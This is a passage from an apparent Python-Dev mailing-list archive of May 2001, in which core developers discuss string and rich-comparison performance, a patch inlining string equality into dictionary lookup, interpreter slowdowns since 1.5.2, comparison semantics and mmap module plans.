code_path, "%s.cvs.prof" % bench_name) profile(PY152, code_path, "%s.152.prof" % bench_name) os.unlink(code_path) if __name__ == "__main__": import sys main(sys.argv[1]) From jim@interet.com Sat May 19 17:45:15 2001 From: jim@interet.com (James C. Ahlstrom) Date: Sat, 19 May 2001 12:45:15 -0400 Subject: [Python-Dev] [off topic] Python is taking over the world Message-ID: <3B06A31B.67A8D010@interet.com> I was in my local (Sommerville, NJ) Borders book store last week and noticed that they stocked many Python books, most in multiple copies. It all added up to three feet of Python books. Great. The clincher was when I went to my YMCA, and saw that someone had posted a flyer offering tutoring in Math, Physics, Java and Python. Congratulations to Guido and all on this list. JimA From guido@digicool.com Sun May 20 00:18:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 19 May 2001 19:18:25 -0400 Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com> For all you Douglas Adams fans out there: Douglas Noel Adams 1952 - 2001 http://www.douglasadams.com --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sun May 20 10:31:25 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 05:31:25 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: [M0artin v. Loewis] > ... > If I set tp_richcompare of strings to 0, I get past this code, and do > > c = (*f)(v, w); > if (PyErr_Occurred()) Note that the usual way to write this is if (c < 0 && PyErr_Occurred()) More work for my artificial "ab" < "cd" case but a net win in real life (when c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, when c < 0 there's no way in the cmp protocol to use c's value alone to distinguish between "less than" and "error"). > return NULL; > return convert_3way_to_object(op, c); > > Here, I get 3 function calls: f is string_compare, then > PyErr_Occurred, finally convert_3way_to_object, which converts > {-1,0,1} x Op -> {Py_True, Py_False}. Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. > Indeed, when I inline convert_3way_to_object, I get the same speed in > both cases (with the remaining differences attributed to measurement > and gcc doing register usage differently in both functions). OK, understood, and thanks for following up! > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. In the absence of significant sorting, I agreed Py_EQ is most frequent. > With a control flow like > > if (a->ob_size != b->ob_size) > goto False; > > if (a->ob_size == 0) > goto True; > > if (a->ob_sval[0] != b->ob_sval[0]) > goto False; > > if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) > goto False; > else > goto True; > > we can reduce the number of function calls Suggest collapsing the third into the first: if (a->ob_size != b->ob_size || a->ob_sval[0] != b->ob_sval[0]) goto False; There's no danger of over-indexing when ob_size==0, because it doesn't include the trailing null byte Python always sticks at the end of string objects; and the first-byte check is much more likely to pay off than the zero-length check (comparison to a null string? gotta be rare as clear conclusions ), and better to test for the more common case first. From tim.one@home.com Sun May 20 10:54:08 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 05:54:08 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> Message-ID: [Tim] >> 1. String objects are also equal despite being different objects, >> if their ob_sinterned pointers are equal and non-NULL. So if >> you're looking for every trick in & out of the book, that's >> another one. [Martin v. Loewis] > That does not help. In the entire test suite, there are 0 instances > where strings are compared which are not identical, but have equal > ob_sinterned pointers. Good to know. Had you tried this a few weeks ago, there would have been thousands (it so happened that one-character strings weren't being interned *effectively*, and there were lots of 1-character cases then where #1 applied; that's been fixed; good to know more aren't popping up). > ... > Whether there's a fruitless branch depends on your compiler. A branch instruction is a branch instruction; I didn't distinguish between taken and non-taken branches, as there's no uniformity in codegen across platforms. > With gcc 3, you can write > > if (__builtin_expect(a == b, 0)) { > > and then the body of the if block will be moved out of the way of > linear control flow. I don't think we'll be littering Python with compiler-specific hacks. It's good to get the less common case out-of-line, but it's not a pure win: while it reduces the penalty when the test doesn't pay, it also reduces the benefit when it does pay (by the wildly architecture-dependent cost of taking a mispredicted out-of-line branch, and the wildly compiler-dependent costs of how seriously they take their own decisions or user hints to out-of-line a block (e.g., the compiler may refetch everything from memory again at the target if it thinks it's truly rare)). >> Any idea where those 800,000 virgin calls to oldcomp are coming >> from? That's a lot. > As far as I could trace it, most of them come from lookdict_string (at > various locations inside this function). Ah! Of course. string_compare is hardwired into lookdict_string. This case may be important enough to merit a distinct _PyString_Equal function, with just the stuff lookdict_string needs (e.g., there's never a gain in testing for pointer equality when called from lookdict_string because the dict code already checked that; but there may be a gain for that test in an all-purpose string_richcompare). > ... > So to support sorting better, I should special-case Py_LT in > string_richcompare also, to avoid the function call ?-) Of course. string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE anway, and that's most of the work for resolving all 6 possibilities. Get rid of string_compare entirely! [on cmp sloth] > Yes, that is a serious problem. Fortunately, very few calls in my > programs go to string_compare through cmp() now. But then, your > programs are different, of course... There are search-tree modules I have but didn't write that do this; I don't care enough about them to frustrate Guido's grand vision > It may be more important for sequences other than 8-bit strings, as each call to a comparison function for a pair of non-string sequences is very expensive (involving more layers of calls for each element comparison). From tim.one@home.com Sun May 20 11:13:14 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 06:13:14 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. If the time machine batteries can hold a full charge, you may want to go back and add Py_CMP as a seventh possible desired-operation argument to tbe rich comparison API. My experience with dict comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp (potentially) compute cmp 3 times to fake one cmp. But if dict richcmp knew a cmp outcome was desired, it could compute it with no extra work to speak of. Then there would be no reason at all to hold on to the dict tp_compare slot. The list and tuple richcmps are also doing almost all the work needed to compute a 3-way cmp outcome. From tim.one@home.com Sun May 20 12:05:53 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 07:05:53 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B037D27.E258C363@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > Running the same test for 2.1 vs. 2.0 there's not much to > notice, so the important changes seem to be originating in > the move from 1.5.2 to 2.0. IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for 1.5.2, and Fredrik did more independently (like inlining high-frequency int operations in the eval loop). Also IIRC, that's the last time any concerted effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and unstable equilibrium never endures without deliberate and persistent rebalancing work. If Python were "a real product", it would be at least one person's full-time job to keep it in peak shape. But it's not even a part-time job for anyone, and I don't see that changing. In compensation, machines have gotten faster much quicker than Python has slowed. From mal@lemburg.com Sun May 20 12:50:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 13:50:17 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07AF79.6EB42E54@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > Running the same test for 2.1 vs. 2.0 there's not much to > > notice, so the important changes seem to be originating in > > the move from 1.5.2 to 2.0. > > IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for > 1.5.2, and Fredrik did more independently (like inlining high-frequency int > operations in the eval loop). Also IIRC, that's the last time any concerted > effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and > unstable equilibrium never endures without deliberate and persistent > rebalancing work. If Python were "a real product", it would be at least one > person's full-time job to keep it in peak shape. But it's not even a > part-time job for anyone, and I don't see that changing. In compensation, > machines have gotten faster much quicker than Python has slowed. How about making performance the main "feature" for 2.3 then ?! 2.0 - 2.2 introduced many new features in the interpreter core, so I think it's time to stabilize those features and focus on making Python regain the performance it had before those features were introduced. At least to some of us, performance is an issue and I think that there's a lot we can do to improve it. One way to open up the field for better performance will be to modularize the interpreter, so that new ways of optimization can be explored, e.g. truning the VM a register machine (Skip once started looking into this with his Rattlesnake patches) or creating specialized VMs which can then be used by optimizing compilers as targets. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh@python.net Sun May 20 12:52:40 2001 From: mwh@python.net (Michael Hudson) Date: 20 May 2001 12:52:40 +0100 Subject: [Python-Dev] Comparison speed In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400" References: Message-ID: "Tim Peters" writes: > Ah! Of course. string_compare is hardwired into lookdict_string. > This case may be important enough to merit a distinct > _PyString_Equal function, with just the stuff lookdict_string needs Or just inlining it all into lookdict_string, something like: Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.90 diff -c -r2.90 dictobject.c *** Objects/dictobject.c 2001/05/19 07:04:38 2.90 --- Objects/dictobject.c 2001/05/20 11:51:28 *************** *** 279,286 **** register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; - cmpfunc compare = PyString_Type.tp_compare; /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS --- 279,287 ---- register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; + #define S(s) ((PyStringObject*)(s)) + /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS *************** *** 299,305 **** freeslot = ep; else { if (ep->me_hash == hash ! && compare(ep->me_key, key) == 0) { return ep; } freeslot = NULL; --- 300,308 ---- freeslot = ep; else { if (ep->me_hash == hash ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0) { return ep; } freeslot = NULL; *************** *** 318,324 **** if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && compare(ep->me_key, key) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; --- 321,329 ---- if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; *************** *** 327,332 **** --- 332,339 ---- if (incr > mask) incr ^= mp->ma_poly; /* clears the highest bit */ } + + #undef S } /* (apologies for the use of the preprocessor...). I'll leave it to someone else to work out if this is a win or not... -- >> REVIEW OF THE YEAR, 2000 << It was shit. Give us another one. -- NTK Know, 2000-12-29, http://www.ntk.net/ From tim.one@home.com Sun May 20 13:57:11 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 08:57:11 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B07AF79.6EB42E54@lemburg.com> Message-ID: [MAL] > How about making performance the main "feature" for 2.3 then ?! Guido may be a dictator, but he doesn't have a magic wand -- "the main feature" is what people volunteer to do and then fight for and then actually do. > 2.0 - 2.2 introduced many new features in the interpreter core, > so I think it's time to stabilize those features and focus on > making Python regain the performance it had before those features > were introduced. At least to some of us, performance is an > issue and I think that there's a lot we can do to improve it. "Performance" is meaningless unless quantified and made concrete: what is it that runs too slowly? "Everything" is not a useful answer. Speeding up line-at-a-time input was an example of something that worked, via focus and measurement and pushing ahead despite opposition. I doubt any other approach will bear fruit over such a short timeframe, and especially not without resources to throw at it. > One way to open up the field for better performance will be > to modularize the interpreter, so that new ways of optimization > can be explored, e.g. truning the VM a register machine > (Skip once started looking into this with his Rattlesnake > patches) or creating specialized VMs which can then be used > by optimizing compilers as targets. Restructure the core for the benefit of optimizing compilers that don't exist? That sounds like an interesting research project, but not much to do with making 2.3 faster. In the meantime, modularization is more likely to make the VM that does exist slower. could-be-it's-easy-answers-or-none-ly y'rs - tim From tim.one@home.com Sun May 20 13:58:09 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 08:58:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: [Michael Hudson] > ... > (apologies for the use of the preprocessor...). I'll leave it to > someone else to work out if this is a win or not... Umm, but that's the *hard* part. I think even Guido knows how to do a string compare inline . From tim.one@home.com Sun May 20 14:09:50 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 09:09:50 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> Message-ID: [Jeremy Hylton] > ... > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. Special-casing the snot out of "O" looks like a winner : count format %total cumulative% ------- -------- ------ ----------- 1440897 'O' 47.45 47.45 327694 'O!' 10.79 58.24 285570 'O|i' 9.40 67.65 262168 'O!|O' 8.63 76.28 227405 'l' 7.49 83.77 146537 's#' 4.83 88.60 76779 'OO|O' 2.53 91.12 65682 '|ss' 2.16 93.29 48033 'OO' 1.58 94.87 39879 'O|O&O&' 1.31 96.18 Those are the top 10 formats passed to PyArg_ParseTuple() during the test suite, after stripping ";" and ":" decorations. fast-paths-on-the-overtired-brain-ly y'rs - tim From aahz@rahul.net Sun May 20 14:50:08 2001 From: aahz@rahul.net (Aahz Maruch) Date: Sun, 20 May 2001 06:50:08 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: from "Tim Peters" at May 20, 2001 06:13:14 AM Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net> Tim Peters wrote: > > If the time machine batteries can hold a full charge, you may want > to go back and add Py_CMP as a seventh possible desired-operation > argument to tbe rich comparison API. My experience with dict > comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE > any cheaper than by doing a full cmp, so I put the dict oldcmp back in > order to avoid having dict richcmp (potentially) compute cmp 3 times > to fake one cmp. But if dict richcmp knew a cmp outcome was desired, > it could compute it with no extra work to speak of. Then there would > be no reason at all to hold on to the dict tp_compare slot. > > The list and tuple richcmps are also doing almost all the work needed > to compute a 3-way cmp outcome. +1 from me; there's one spot in my new Decimal.py where I optimize an expensive pair of equality tests down to one by using cmp(), and it's likely that similar cases will pop up. When I convert to C code, I'll want to keep doing that. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From martin@loewis.home.cs.tu-berlin.de Sun May 20 14:48:43 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 20 May 2001 15:48:43 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> > string_compare() could special-case pointer equality too, although I suspect > doing so would be a net loss. I've done some measurements here, too, again taking your example from time import clock indices = [1] * 1000000 def doit(): s = clock() for i in indices: "ab" < "ab" f = clock() return f - s for i in xrange(10): print "%.3f" % doit() This is the case where testing for identity helps. Running it without identity test takes 0.74s, running it with identity test takes 0.68s. Now, looking at the case of non-identical pointers, I could not find any measurable difference. After increasing the number of rounds by a factor of ten, I got, without identity test 6.920 6.920 6.910 6.970 7.080 6.920 6.920 6.910 6.930 6.920 With identity test, I got 6.930 6.930 6.920 7.080 6.920 6.930 6.960 6.930 6.920 6.920 That still does not look like a significant difference to me. Regards, Martin From guido@digicool.com Sun May 20 14:56:54 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 20 May 2001 09:56:54 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT." References: Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> > If the time machine batteries can hold a full charge, you may want to go back > and add Py_CMP as a seventh possible desired-operation argument to tbe rich > comparison API. Funny, I was thinking about this too last night. > My experience with dict comparisons was that dict_richcompare > couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full > cmp, so I put the dict oldcmp back in order to avoid having dict > richcmp (potentially) compute cmp 3 times to fake one cmp. But if > dict richcmp knew a cmp outcome was desired, it could compute it > with no extra work to speak of. Then there would be no reason at > all to hold on to the dict tp_compare slot. I'm not sure I see the saving. There's no real saving in time, because you still have to make separate calls for EQ and CMP, right? There might be a saving in code, but you could solve that internally in dictobject.c by restructuring the code somewhat so that dict_compare shared more with dict_richcompare, right? It's mostly an API streamlining. The other difference between tp_compare and tp_richcompare is that the latter returns an object which makes testing for errors unambiguous. But (for several releases) we would still have to support tp_compare for b/w compatibility with old 3r party extensions. > The list and tuple richcmps are also doing almost all the work needed to > compute a 3-way cmp outcome. Ditto. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Sun May 20 17:19:29 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 18:19:29 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07EE91.5747F4F4@lemburg.com> Tim Peters wrote: > > [MAL] > > How about making performance the main "feature" for 2.3 then ?! > > Guido may be a dictator, but he doesn't have a magic wand -- "the main > feature" is what people volunteer to do and then fight for and then actually > do. I will certainly go back to the basics and redo my optimization patches for Python later this year. Whether or not these will get included in the core is another story, but I have a need for a fast interpreter for my app. server and can't afford losing too much performance when moving from 1.5.x to 2.x. > > 2.0 - 2.2 introduced many new features in the interpreter core, > > so I think it's time to stabilize those features and focus on > > making Python regain the performance it had before those features > > were introduced. At least to some of us, performance is an > > issue and I think that there's a lot we can do to improve it. > > "Performance" is meaningless unless quantified and made concrete: what is it > that runs too slowly? "Everything" is not a useful answer. Speeding up > line-at-a-time input was an example of something that worked, via focus and > measurement and pushing ahead despite opposition. I doubt any other approach > will bear fruit over such a short timeframe, and especially not without > resources to throw at it. Let's put it this way: if pystone gets a 50% boost, then all applications should benefit from it regardeless whether they are function call intense or fiddle with a lot of attributes. Achieving those 50% will be a lot harder than for the 1.5 series, though ;-) > > One way to open up the field for better performance will be > > to modularize the interpreter, so that new ways of optimization > > can be explored, e.g. truning the VM a register machine > > (Skip once started looking into this with his Rattlesnake > > patches) or creating specialized VMs which can then be used > > by optimizing compilers as targets. > > Restructure the core for the benefit of optimizing compilers that don't > exist? That sounds like an interesting research project, but not much to do > with making 2.3 faster. In the meantime, modularization is more likely to > make the VM that does exist slower. Depends on how you look at it: extension writers will then have the possibility of plugging in new compilers and VMs into Python to experiment with new optimization strategies. The Rattlesnake project is one such project which would do great with this plugin logic since it uses special opcodes which an optimizer generates and then needs a modified VM to execute these new byte code streams... from Rattlesnake import compiler, vm sys.use_compiler(compiler) sys.use_vm(vm) This won't make stock Python 2.3 faster, but at least provide better means for experiments in that direction. Alternative VM implementations like Stackless Python would also benefit from it. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Sun May 20 22:13:04 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 17:13:04 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, on pointer-equality tests in string_compare()] > I've done some measurements here, too, again taking your example > ... > for i in indices: > "ab" < "ab" > ... > This is the case where testing for identity helps. Running it without > identity test takes 0.74s, running it with identity test takes 0.68s. This stuff all ties together. A pointer-equality test in string_compare() is guaranteed to lose every time string_compare() gets called from lookdict_string(). Let's lose string_compare() entirely (in favor of a self-contained-- apart from memcmp() --string_richcompare). From tim.one@home.com Sun May 20 22:37:09 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 17:37:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> Message-ID: [Tim, muses about a Py_CMP value for rich comparisons, and talks mostly about dict comps] > ... > I'm not sure I see the saving. There's no real saving in time, > because you still have to make separate calls for EQ and CMP, right? Right so far as it goes. A "fast path" (which currently doesn't exist but is clearly worth adding, based on both my and Martin's timings) for doing *all* kinds of same-type comparisons would only have to look for a richcompare slot, though, not one kind of slot in some cases and another in others. Uniformity is contagious . > There might be a saving in code, but you could solve that internally > in dictobject.c by restructuring the code somewhat so that > dict_compare shared more with dict_richcompare, right? Right, there would be no reduction in total code, and the dict routines already share as much as possible. In effect, the body of dict_compare would replace the last res = Py_NotImplemented; line in the (currently tiny) dict_richcompare guarded by the appropriate tests. > It's mostly an API streamlining. Bingo, and the possibility of retiring the tp_compare slot in P3K. > The other difference between tp_compare and tp_richcompare is that > the latter returns an object which makes testing for errors unambiguous. Also cool. > But (for several releases) we would still have to support tp_compare > for b/w compatibility with old 3r party extensions. Sure, although the way the CVS branch code is going it could be that 2.2 is the long-awaited utterly incompatible P3K anyway . >> The list and tuple richcmps are also doing almost all the work needed >> to compute a 3-way cmp outcome. > Ditto. Oh no! Those aren't like dict compares. A rich compare for sequence types (whether strings or lists) *has* to contain almost all the code necessary to implement cmp(), because just resolving Py_EQ in all cases has to find "the first" element (if any) that differs. Once that's known, you're at most one measly element compare away from producing the right cmp() outcome. This isn't true of dict compares: the algorithm for resolving dict Py_EQ/Py_NE when the dict sizes are the same doesn't do anything to help resolve general cmp(). Yes, a tp_compare slot could be re-added to lists and tuples, and implemented via refactoring their current tp_richcompare code into a common internal routine, but then we've just added another layer of function calls for all cases. I've timed C function calls, and it turns out they aren't actually free . From tim.one@home.com Mon May 21 08:53:24 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 21 May 2001 03:53:24 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I would like to break this down by defining the mapping between cmp() > and rich comparisons. Good idea! > I propose: > > - If cmp() is requested but not defined, and rich comparisons are > defined, try ==, <, > in order; if all three yield false, act as if > rich comparisons were not defined, and use the fallback comparison > (i.e. by address). Here and below didn't cover the case where cmp() is requested and is defined. I believe it's agreed now (but wasn't yet at the time you wrote this) that cmp() will be called in that case (and which requires changes to the current implementation). > - If a rich comparison is requested but not defined, use cmp() and use > the obvious mapping. Cool, except this is missing what I believe was intended detail, like that when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be tried before falling back to cmp(). Also note this today: class C: def __lt__(x, y): print "in __lt__" return NotImplemented def __gt__(x, y): print "in __gt__" return NotImplemented C() < C() That prints in __lt__ in __gt__ in __gt__ in __lt__ I don't know to explain why each method gets called twice (well, I do, but it's hard to swallow ). Again this can have semantic consequences, e.g. if the methods have side-effects; and unclear whether this is intended, a bug, or implementation-defined. > - Continue to define the comparison of unequal sequences in terms of > cmp(). "the comparison" is ambiguous there: you mean all comparisons? just cmp() comparisons? just rich comparisons? In any case, also unclear what "in terms of cmp()" means: that every pair of corresponding elements must be compared via cmp()? Or that only the first non-Py_EQ pair must be compared via cmp()? Pseudo-code would be much clearer than English here. > - Testing == or != for sequences takes these shortcuts: Must take these shortcuts, or may take these shortcuts? > 1. if the lengths differ, the sequences differ Note that I removed the tuple_richcompare code for doing this, because I never found a case where tuples were compared via Py_EQ/Py_NE and the lengths differed. So the length-check in this case was a waste of time. It isn't true of lists or strings that it's a waste of time, but I believe there are strong reasons for why programs simply will not compare different-sized tuples for equality. I would not like to pay for tuple length checks if only one case in 500 billion would benefit, but if #1 is a mandatory shortcut there's no choice. > 2. compare the elements using == until a false return is found Currently the sequence rich-compare code does #2 for all 6 comparison operators. Is that wrong? Looked reasonable to me! > Note that this defines 'x!=y' as 'not x==y' for sequences. We could > easily go the extra mile and define != to use only != on the items; > but is this worth the extra complexity? Not at all: tuples and lists are Python's sequence types, so Python is entitled to define what comparison means for them in any way it likes. We've already got cases where (see the first msg in this thread) [x] cmpop [y] may yield a different result than x cmpop y so we've already punted on doing the best-possible job of mimicking whatever crazy-ass comparisons user-defined objects implement, when those objects are contained in Python sequences. My bias is showing : I want Python's builtin sequence types to be as efficient as possible. Nasty example: two conformable (same rank and dimensions) NumPy matrices A and B return a conformable matrix of 0/1 bits when compared via "<" (well, maybe they actually don't, but that's what drove richcmps to begin with!). It may well be *convenient* for them if (A1, A2, A3) < (B1, B2, B3) always returned a list (or tuple) of 3 0/1 matrices too: [A1 < B1, A2 < B2, A3 < B3] So builtin sequence comparisons can't be all things to all people regardless. From Barrett@stsci.edu Mon May 21 13:17:09 2001 From: Barrett@stsci.edu (Paul Barrett) Date: Mon, 21 May 2001 08:17:09 -0400 Subject: [Python-Dev] mmap module References: Message-ID: <3B090745.5D70353E@STScI.Edu> Tim Peters wrote: > > [Paul Barrett] > > In the CVS log of the mmapmodule.c, Tim Peters says: > > > > "The code really needs to be rethought from scratch (not by me, though > > ...)." > > That was in specific reference to the code I changed, in mmap_find_method. > The difficulty is that mmap is great for "large files", but the code before > my change used a C int for the starting offset and also for the return > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 > bytes). The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform > capabilities out of reach for large files (e.g., "even Win95" *allows* > specifying 64-bit offsets when creating a mapped file view). C is a > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() > don't cater to the full range of C integral types anyway. In other words, > if this code is ever to reach its full potential, it "really needs to be > rethought from scratch". OK, thanks for the clarification. > > The ability to have offsets into a file that are not multiples of the > > system pagesize would also be nice. > > It's OS-specific. Python should grow warts to protect against it on the > OSes that care. Well, hopefully the OS-differences wouldn't prevent implementing a more abstract interface. > > I'd be willing to submit a PEP on a new mmapmodule, once I know what > > others would like. > > Hard to say. This has the potential to become Python's next thread > subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If > you do write a PEP, I vote to say that we'll cover Windows and Linux (and > maybe Mac OS X?) out of the box, but any other platform is at your own risk > (it doesn't really help if somebody pops up volunteering to support a > minority platform, because they eventually go away, their code stops > working, and it never gets fixed -- so it's use-at-your-own-risk in reality > regardless). Yes, I agree. Windows, Unix/Linux, and Mac OS X should be the supported platforms. My intention is not to make major changes to the Python interface, but to fix bugs and to implement some additional features, such as a non-pagesize file offset. I'll try to get something written up in the near future. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From martin@loewis.home.cs.tu-berlin.de Mon May 21 17:44:59 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 18:44:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de> > This stuff all ties together. A pointer-equality test in string_compare() is > guaranteed to lose every time string_compare() gets called from > lookdict_string(). Let's lose string_compare() entirely (in favor of a > self-contained-- apart from memcmp() --string_richcompare). Ok. I've now updated my patch on SF to remove string_compare, inline everything into string_richcompare, add _PyString_Eq, and use that in lookdict_string. Who would want to review and approve/reject this patch? Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 21 18:03:59 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 19:03:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> > Note that the usual way to write this is > > if (c < 0 && PyErr_Occurred()) > > More work for my artificial "ab" < "cd" case but a net win in real life (when > c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, > when c < 0 there's no way in the cmp protocol to use c's value alone to > distinguish between "less than" and "error"). Ok. I've updated my tp_compare patch on SF to do so; it also un-deprecates UserList.__cmp__. > > Here, I get 3 function calls: f is string_compare, then > > PyErr_Occurred, finally convert_3way_to_object, which converts > > {-1,0,1} x Op -> {Py_True, Py_False}. > > Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. Any reason why PyThreadState_GET isn't used there? > There's no danger of over-indexing when ob_size==0, because it doesn't > include the trailing null byte Python always sticks at the end of string > objects; and the first-byte check is much more likely to pay off than the > zero-length check (comparison to a null string? gotta be rare as clear > conclusions ), and better to test for the more common case first. This is now also in the string_richcompare patch on SF. Regards, Martin From tim.one@home.com Mon May 21 19:29:02 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 21 May 2001 14:29:02 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com> Message-ID: [Fred checkin] > > *************** > > *** 2610,2617 **** > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200*200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.4, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] > > --- 2610,2617 ---- > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200 * 200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.400000000000002, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] [Guido] > Hmm... The tutorial now contains at least one example of floating > point imprecision. Does it also contain text to explain this? (I'm > sure Tim would be happy to provide some if there isn't any. :-) [Fred] > It contains others, and I don't think there's an explanation. Some > text from Tim to explain this would be greatly apprectiated! Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: so long as we rely on the platform C to format floats, the output isn't 